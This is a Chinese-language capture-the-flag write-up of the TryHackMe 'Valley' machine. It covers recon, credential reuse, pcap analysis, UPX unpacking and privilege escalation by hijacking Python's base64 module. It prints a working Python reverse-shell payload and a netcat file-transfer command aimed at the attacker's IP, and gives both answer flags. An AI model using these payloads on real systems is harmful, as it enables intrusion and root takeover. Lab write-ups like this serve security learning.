Valley靶机渗透实战：从凭证复用到Python库劫持

Valley靶机渗透报告 - TryHackMe

本文详细记录了我渗透TryHackMe平台"Valley"靶机的完整方法论。该靶机突显了凭证复用、硬编码密钥和系统文件访问控制不当带来的安全风险。

侦察阶段

我首先扫描目标机器以识别开放端口和服务。为了平衡速度和全面性，我使用了侵略性SYN扫描。

初始扫描显示端口22（SSH）、80（HTTP）和37370处于开放状态。

为了获取详细的版本信息并运行默认脚本，我执行了后续服务扫描。

结果：

• 端口22：OpenSSH
• 端口80：Apache httpd 2.4.41（Ubuntu）
• 端口37370：vsftpd 3.0.3

枚举阶段

我使用gobuster发现Web服务器上的隐藏目录。

扫描发现了几个目录：/gallery、/static和/pricing。"Valley Photo Co."网站是一个简单的宣传网站。检查源代码没有发现有趣的内容，于是我探索已发现的目录。

我注意到/gallery部分中的图像是从/static/目录加载的，带有数字ID（例如/static/1）。我决定对/static/目录进行模糊测试以寻找其他隐藏文件。

这次扫描发现了一个名为/00的文件，它比图像文件小得多。访问/static/00显示了一条来自开发人员valleyDev的笔记，其中提到了一个隐藏的开发目录：/dev1243224123123。

访问/dev1243224123123端点显示了一个登录页面。

在没有有效凭证的情况下，我检查了页面源代码。JavaScript身份验证逻辑是客户端的且为明文。

我在登录表单上使用了这些凭证（siemDev:california），这授予了对另一个笔记的访问权限。该笔记是向员工发出的关于为FTP服务复用凭证的警告。这明确提示我尝试在端口37370上运行的vsFTPd服务上使用这些凭证。

利用阶段

我使用发现的凭证连接到FTP服务。

登录成功。我找到了三个.pcapng网络捕获文件。

在启用被动模式后，我使用mget *将它们下载到我的机器上。

我使用Wireshark分析数据包捕获。HTTP2.pcap文件包含了最有趣的数据。在过滤掉UDP数据包并专注于TCP流后，我在TCP流索引31中发现了一个明文HTTP POST请求。

该请求发送到/index.html，并包含凭证valleyDev:ph0t0s1234。我尝试使用Burp Suite自己POST到/index.html，但没有产生任何结果。相反，我尝试在端口22上通过SSH使用这些凭证。

登录成功，我获得了第一个标志（user.txt）。

权限提升

我开始枚举系统以寻找权限提升向量。我检查了/etc/crontab文件，发现了一个每分钟以root身份运行的cron作业：

这个位于/photos/script/photosEncrypt.py的脚本将照片编码为Base64。该脚本循环遍历/photos/中的图像（p1.jpg到p6.jpg），读取它们，进行编码，并将输出保存到/photos/photoVault，扩展名为.enc。

我无法修改或删除原始的pX.jpg文件，因为它们由用户valley拥有，而不是valleyDev。我的下一个目标是横向移动到valley用户。

在/home目录中，我找到了一个名为valleyAuthenticator的ELF二进制文件。执行时，它会提示输入凭证，但我收集的凭证无效。

我决定使用nc将此文件传输到我的机器。我首先验证了netcat是否已安装在机器上。

然后我将nc切换到监听器模式，指定我将要给接收的文件命名。

最后一步，从发送文件的机器上，我使用了以下命令：

nc 10.13.91.64 4444 < valleyAuthenticator

文件在我的机器上后，我使用了strings命令并将输出保存到文本文件。

为了高效分析字符串，我使用了CyberChef。我将strings.txt文件上传到CyberChef，并应用过滤器仅显示具有显著长度（例如21个字符）的字符串以找到有意义的数据。在结果中，我立即注意到了一个明确的指示符：字符串"UPX!"，这确认了二进制文件是使用UPX打包的。

我使用命令upx -d valleyAuthenticator解包了二进制文件。然后我再次对解包后的二进制文件运行strings，保存新输出，并将其上传到CyberChef。

重新应用过滤器后，我在文件开头附近找到了两个MD5哈希。

我使用在线哈希破解服务（CrackStation）解密它们，得到了明文凭证。

我使用这些凭证切换到valley用户。

现在作为valley用户，我需要重新评估通往root的路径。我最初的想法是通过修改源图像（p1.jpg - p6.jpg）来利用此脚本。然而，我发现我无法删除或在该目录中创建新文件；我只能修改现有文件。

过了一段时间，我记得脚本导入了base64模块，我考虑如果我有正确的权限，可以劫持该导入。

我使用id命令检查了我的组成员身份，发现我是valleyAdmin组的成员。

然后我检查了Python base64.py库的权限，看看我的组是否有写访问权。

该文件可由valleyAdmin组写入。由于我是该组的成员，我可以修改它。我使用nano编辑了/usr/lib/python3.8/base64.py，并插入了一个Python反向shell有效载荷：

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.91.64",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

我在我的机器上启动了一个netcat监听器，并等待cron作业执行（在一分钟内）。脚本导入了恶意的base64模块，该模块执行了我的反向shell代码，授予我一个root shell。

我成功以root身份接收到了连接，并可以检索最终标志（root.txt）。

问题答案

1. 用户标志是什么？ THM{k@l1_1n_th3_v@lley}
2. 根标志是什么？ THM{v@lley_0f_th3_sh@d0w_0f_pr1v3sc}

就这些！感谢阅读，下次再见！希望这份报告对您有所帮助。